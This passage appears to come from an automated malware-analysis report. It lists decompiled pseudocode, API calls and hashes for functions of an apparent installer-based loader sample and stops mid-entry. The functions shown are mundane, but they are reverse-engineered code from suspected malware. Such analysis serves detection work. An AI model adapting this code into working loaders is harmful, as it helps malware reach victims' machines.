				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A0C(3);
				 *(_t55 + 8) = E00402A0C(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A29(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405AF6();
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                  0x00401bd3
                                                  0x00401bdf
                                                  0x00401be2
                                                  0x00401beb
                                                  0x00401beb
                                                  0x00401bee
                                                  0x00401bf2
                                                  0x00401bfb
                                                  0x00401bfb
                                                  0x00401bfe
                                                  0x00401c02
                                                  0x00401c04
                                                  0x00401c51
                                                  0x00401c53
                                                  0x00401c5c
                                                  0x00401c64
                                                  0x00401c67
                                                  0x00401c67
                                                  0x00401c70
                                                  0x00000000
                                                  0x00401c06
                                                  0x00401c0d
                                                  0x00401c0f
                                                  0x00401c17
                                                  0x00401c1a
                                                  0x00401c42
                                                  0x00401c76
                                                  0x00401c76
                                                  0x00401c1c
                                                  0x00401c2a
                                                  0x00401c32
                                                  0x00401c35
                                                  0x00401c35
                                                  0x00401c1a
                                                  0x00401c79
                                                  0x00401c7c
                                                  0x00401c82
                                                  0x00402866
                                                  0x00402866
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                  • SendMessageA.USER32 ref: 00401C42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                                  • Instruction ID: 8eb34b9659dedbc099cc11ce9bc18cab6bc834bdcc036981f8d30f042af137bc
                                                  • Opcode Fuzzy Hash: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                                  • Instruction Fuzzy Hash: C621A171A44149BEEF02AFF4C94AAEE7B75EF44704F10407EF501BA1D1DAB88A40DB29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040568B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040568B(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                  0x0040568c
                                                  0x004056a3
                                                  0x004056ab
                                                  0x004056ab
                                                  0x004056b3

                                                  APIs
                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405691
                                                  • CharPrevA.USER32(?,00000000), ref: 0040569A
                                                  • lstrcatA.KERNEL32(?,00409010), ref: 004056AB
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040568B
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-4017390910
                                                  • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                  • Instruction ID: e5ee9c2d52b027f92723a61f0ff242ac356e57f7af316d882355b101730f0027
                                                  • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                  • Instruction Fuzzy Hash: 05D0A972606A302AE60227158C09F8B3A2CCF02321B040462F540B6292C2BC7D818BEE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73055830, Relevance: 6.1, APIs: 4, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VariantClear.OLEAUT32(730514CC), ref: 7305583D
                                                  • VariantClear.OLEAUT32(?), ref: 730558A0
                                                  • VariantClear.OLEAUT32(?), ref: 730558DE
                                                  • SafeArrayDestroy.OLEAUT32(00000000), ref: 7305592B
                                                    • Part of subcall function 73051520: VariantClear.OLEAUT32(?), ref: 7305152A
                                                    • Part of subcall function 73051520: SafeArrayDestroy.OLEAUT32(00000000), ref: 73051540
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ClearVariant$ArrayDestroySafe
                                                  • String ID:
                                                  • API String ID: 2727283166-0
                                                  • Opcode ID: 781f072cea31b8b2e23c0356b54598df98956786f8c71d5928d6951b5c880132
                                                  • Instruction ID: c4ea0d1f268ceb50efab4c6d796e5094ad045525c3d245cf2d61b42bb56ea90a
                                                  • Opcode Fuzzy Hash: 781f072cea31b8b2e23c0356b54598df98956786f8c71d5928d6951b5c880132
                                                  • Instruction Fuzzy Hash: 7B41D6B5A00208EBDB08CF58C594F9D77B6FB84714F248598F8066B345D731EE82DB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 7305D6A6, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E7305D6A6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E73058153( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E7305D4EC( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E73058DC4(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}
















                                                  0x7305d6ae
                                                  0x7305d6b3
                                                  0x7305d6cd
                                                  0x00000000
                                                  0x7305d6cd
                                                  0x7305d6b5
                                                  0x7305d6ba
                                                  0x00000000
                                                  0x00000000
                                                  0x7305d6bf
                                                  0x7305d6dc
                                                  0x7305d6e1
                                                  0x7305d6e4
                                                  0x7305d6eb
                                                  0x7305d70a
                                                  0x7305d711
                                                  0x7305d713
                                                  0x7305d757
                                                  0x7305d766
                                                  0x7305d774
                                                  0x7305d776
                                                  0x7305d786
                                                  0x7305d786
                                                  0x7305d78a
                                                  0x7305d78c
                                                  0x7305d78f
                                                  0x7305d78f
                                                  0x7305d78f
                                                  0x7305d78f
                                                  0x00000000
                                                  0x7305d795
                                                  0x7305d778
                                                  0x7305d778
                                                  0x7305d77d
                                                  0x7305d77d
                                                  0x7305d780
                                                  0x00000000
                                                  0x7305d780
                                                  0x7305d715
                                                  0x7305d718
                                                  0x7305d71c
                                                  0x7305d745
                                                  0x7305d745
                                                  0x7305d748
                                                  0x7305d748
                                                  0x00000000
                                                  0x00000000
                                                  0x7305d74a
                                                  0x7305d74e
                                                  0x00000000
                                                  0x00000000
                                                  0x7305d750
                                                  0x7305d750
                                                  0x00000000
                                                  0x7305d750
                                                  0x7305d71e
                                                  0x7305d721
                                                  0x00000000
                                                  0x00000000
                                                  0x7305d725
                                                  0x7305d738
                                                  0x7305d73e
                                                  0x7305d741
                                                  0x7305d743
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x7305d743
                                                  0x7305d6ed
                                                  0x7305d6f0
                                                  0x7305d6f2
                                                  0x7305d6f7
                                                  0x7305d6f7
                                                  0x7305d6fc
                                                  0x00000000
                                                  0x7305d6fc
                                                  0x7305d6c1
                                                  0x7305d6c6
                                                  0x7305d6ca
                                                  0x7305d6ca
                                                  0x00000000

                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 7305D6DC
                                                  • __isleadbyte_l.LIBCMT ref: 7305D70A
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,00000000,00000000,?,00000000), ref: 7305D738
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,00000000), ref: 7305D76E
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  • Opcode ID: 1c86ed6e6505dbe8bd18a1e440030924fc2c967897522616df5b88ca4527ba95
                                                  • Instruction ID: 726f75c1b68edb0d898ad31914d5f9e779aec5ea3b23fdac212610508d3be5bc
                                                  • Opcode Fuzzy Hash: 1c86ed6e6505dbe8bd18a1e440030924fc2c967897522616df5b88ca4527ba95
                                                  • Instruction Fuzzy Hash: 0631943260124AAFDB129E65C844FAB7BFAFF41B10F15451AF47A8B1E0E730D851DB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 730581FC, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E730581FC(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E7305874D(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E73058282(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E730589C8(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E73058907(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                                  0x730581ff
                                                  0x73058205
                                                  0x73058278
                                                  0x00000000
                                                  0x7305820c
                                                  0x7305820c
                                                  0x7305820f
                                                  0x7305822a
                                                  0x7305822d
                                                  0x7305824d
                                                  0x7305825f
                                                  0x7305822f
                                                  0x7305822f
                                                  0x73058232
                                                  0x00000000
                                                  0x73058234
                                                  0x73058246
                                                  0x73058246
                                                  0x73058232
                                                  0x7305827d
                                                  0x73058281
                                                  0x73058211
                                                  0x73058229
                                                  0x73058229
                                                  0x7305820f

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                  • String ID:
                                                  • API String ID: 3016257755-0
                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                  • Instruction ID: b3bd0e74077d40966823b785a29ccd602acd6c912bda7c43823397034a68690e
                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                  • Instruction Fuzzy Hash: D401363220064ABBCF025E85CC01DEE3F67BB19A50F598515FE1A98074D736D6B1AB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401D38, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 67%
                                                  			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b014->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b024 = E00402A0C(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b02b = 1;
				 *0x40b028 = _t11 & 0x00000001;
				 *0x40b029 = _t11 & 0x00000002;
				 *0x40b02a = _t11 & 0x00000004;
				E00405BBA(_t18, _t24, _t26, 0x40b030,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b014);
				_push(_t14);
				_push(_t26);
				E00405AF6();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                  0x00401d46
                                                  0x00401d5f
                                                  0x00401d69
                                                  0x00401d6e
                                                  0x00401d79
                                                  0x00401d80
                                                  0x00401d92
                                                  0x00401d98
                                                  0x00401d9d
                                                  0x00401da7
                                                  0x004024eb
                                                  0x00401561
                                                  0x00402866
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirect
                                                  • String ID:
                                                  • API String ID: 3272661963-0
                                                  • Opcode ID: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                                  • Instruction ID: 0c2e595a2d755a053b7cc3d6c09569b1e3f8f946256c05fe5e222a6b1ed621d0
                                                  • Opcode Fuzzy Hash: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                                  • Instruction Fuzzy Hash: B0F0C870E48280AFE70157705F0ABAB3F64D715305F100876F251BA2E3C7B910088BAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402BF1, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00402BF1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x4170e0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x423f4c;
						if(_t2 >  *0x423f4c) {
							_t3 = CreateDialogParamA( *0x423f40, 0x6f, 0, E00402B6E, 0);
							 *0x4170e0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F64(0);
					}
				} else {
					_t6 =  *0x4170e0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x4170e0 = 0;
					return _t6;
				}
			}






                                                  0x00402bf8
                                                  0x00402c12
                                                  0x00402c18
                                                  0x00402c22
                                                  0x00402c28
                                                  0x00402c2e
                                                  0x00402c3f
                                                  0x00402c48
                                                  0x00000000
                                                  0x00402c4d
                                                  0x00402c54
                                                  0x00402c1a
                                                  0x00402c21
                                                  0x00402c21
                                                  0x00402bfa
                                                  0x00402bfa
                                                  0x00402c01
                                                  0x00402c04
                                                  0x00402c04
                                                  0x00402c0a
                                                  0x00402c11
                                                  0x00402c11

                                                  APIs
                                                  • DestroyWindow.USER32 ref: 00402C04
                                                  • GetTickCount.KERNEL32(00000000,00402DD1,00000001), ref: 00402C22
                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                                  • Instruction ID: 902fecb1894dce430947e24fe85b059bfb73d5b7bbd16117cdf5d745fa908bfb
                                                  • Opcode Fuzzy Hash: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                                  • Instruction Fuzzy Hash: 37F03030A09321ABC611EF60BE4CA9E7B74F748B417118576F201B11A4CB7858818B9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73052250, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 81%
                                                  			E73052250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr* _t95;
				intOrPtr* _t100;
				intOrPtr* _t103;
				intOrPtr* _t110;
				void* _t117;
				intOrPtr _t123;
				intOrPtr* _t165;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;

				if(_a12 == 0) {
					_v12 = 0;
				} else {
					_v12 = 1;
				}
				 *((intOrPtr*)(_a16 + 0xc)) = _v12;
				_t9 = _a16 + 0xc; // 0xc558b00
				 *(_a16 + 8) = _a8 +  *_t9;
				if(_a12 == 0) {
					_v16 = 0;
				} else {
					_v16 = 0x7306731c;
				}
				 *((intOrPtr*)(_a16 + 4)) = _v16;
				if(_a8 == 0) {
					__eflags = _a12;
					if(_a12 == 0) {
						_v20 = 0;
					} else {
						_v20 =  *((intOrPtr*)(_a4 + 0x44)) + ( *(_a4 + 0x40) << 4) - 0x10;
					}
					_t95 = _a16;
					 *_t95 = _v20;
					return _t95;
				} else {
					_t123 = _a4;
					_t153 =  *((intOrPtr*)(_t123 + 0x40));
					_t177 =  *((intOrPtr*)(_t123 + 0x40)) - _a8;
					if( *((intOrPtr*)(_t123 + 0x40)) < _a8) {
						_push(0x35a);
						E73055DA9(_t117, _t153, _t170, _t171, _t177, L"ctx->top >= arg_cnt", L"C:\\xampp\\htdocs\\Loct\\87441519555141b6935f4940bcbda0c2\\Loader\\Project4\\Project4\\Source.c");
					}
					_v8 = 1;
					while(_v8 << 1 <= _a8) {
						_t103 =  *((intOrPtr*)(_a4 + 0x44)) + ( *(_a4 + 0x40) - _v8 << 4);
						_v36 =  *_t103;
						_v32 =  *((intOrPtr*)(_t103 + 4));
						_v28 =  *((intOrPtr*)(_t103 + 8));
						_v24 =  *((intOrPtr*)(_t103 + 0xc));
						_t44 = _v8 - 1; // -1
						_t165 =  *((intOrPtr*)(_a4 + 0x44)) + ( *(_a4 + 0x40) - _a8 + _t44 << 4);
						_t110 =  *((intOrPtr*)(_a4 + 0x44)) + ( *(_a4 + 0x40) - _v8 << 4);
						 *_t110 =  *_t165;
						 *((intOrPtr*)(_t110 + 4)) =  *((intOrPtr*)(_t165 + 4));
						 *((intOrPtr*)(_t110 + 8)) =  *((intOrPtr*)(_t165 + 8));
						 *((intOrPtr*)(_t110 + 0xc)) =  *((intOrPtr*)(_t165 + 0xc));
						_t63 = _v8 - 1; // -1
						_t169 =  *((intOrPtr*)(_a4 + 0x44)) + ( *(_a4 + 0x40) - _a8 + _t63 << 4);
						 *_t169 = _v36;
						 *((intOrPtr*)(_t169 + 4)) = _v32;
						 *((intOrPtr*)(_t169 + 8)) = _v28;
						 *((intOrPtr*)(_t169 + 0xc)) = _v24;
						_v8 = _v8 + 1;
					}
					_t78 = _a16 + 8; // 0x6a51e44d
					_t100 = _a16;
					 *_t100 =  *((intOrPtr*)(_a4 + 0x44)) + ( *(_a4 + 0x40) << 4) - ( *_t78 << 4);
					return _t100;
				}
			}





















                                                  0x7305225a
                                                  0x73052265
                                                  0x7305225c
                                                  0x7305225c
                                                  0x7305225c
                                                  0x73052272
                                                  0x7305227b
                                                  0x73052281
                                                  0x73052288
                                                  0x73052293
                                                  0x7305228a
                                                  0x7305228a
                                                  0x7305228a
                                                  0x730522a0
                                                  0x730522a7
                                                  0x730523b9
                                                  0x730523bd
                                                  0x730523d7
                                                  0x730523bf
                                                  0x730523d2
                                                  0x730523d2
                                                  0x730523de
                                                  0x730523e4
                                                  0x00000000
                                                  0x730522ad
                                                  0x730522ad
                                                  0x730522b0
                                                  0x730522b3
                                                  0x730522b6
                                                  0x730522b8
                                                  0x730522c7
                                                  0x730522cc
                                                  0x730522cf
                                                  0x730522e1
                                                  0x73052301
                                                  0x73052305
                                                  0x7305230b
                                                  0x73052311
                                                  0x73052317
                                                  0x73052326
                                                  0x73052333
                                                  0x73052347
                                                  0x7305234b
                                                  0x73052350
                                                  0x73052356
                                                  0x7305235c
                                                  0x7305236b
                                                  0x73052378
                                                  0x7305237d
                                                  0x73052382
                                                  0x73052388
                                                  0x7305238e
                                                  0x730522de
                                                  0x730522de
                                                  0x730523aa
                                                  0x730523b2
                                                  0x730523b5
                                                  0x00000000
                                                  0x730523b5

                                                  APIs
                                                  Strings
                                                  • C:\xampp\htdocs\Loct\87441519555141b6935f4940bcbda0c2\Loader\Project4\Project4\Source.c, xrefs: 730522BD
                                                  • ctx->top >= arg_cnt, xrefs: 730522C2
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __wassert
                                                  • String ID: C:\xampp\htdocs\Loct\87441519555141b6935f4940bcbda0c2\Loader\Project4\Project4\Source.c$ctx->top >= arg_cnt
                                                  • API String ID: 3993402318-1440977952
                                                  • Opcode ID: 5661ebdd9b0366de5a61202144bb33f7c6197ba74fad30ac3a5e16e049600199
                                                  • Instruction ID: d4159f347bac34d8972f020b681c021cc90710662d1a5587275491283eaa63ec
                                                  • Opcode Fuzzy Hash: 5661ebdd9b0366de5a61202144bb33f7c6197ba74fad30ac3a5e16e049600199
                                                  • Instruction Fuzzy Hash: 5D51D574A04209DFDB08CF58C194AADBBB2FF88314F14C299E81A9B355D731EA81CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73052060, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 73051C40: __wassert.LIBCMT ref: 73051C5C
                                                  • VariantClear.OLEAUT32(?), ref: 730520BC
                                                  Strings
                                                  Memory Dump Source
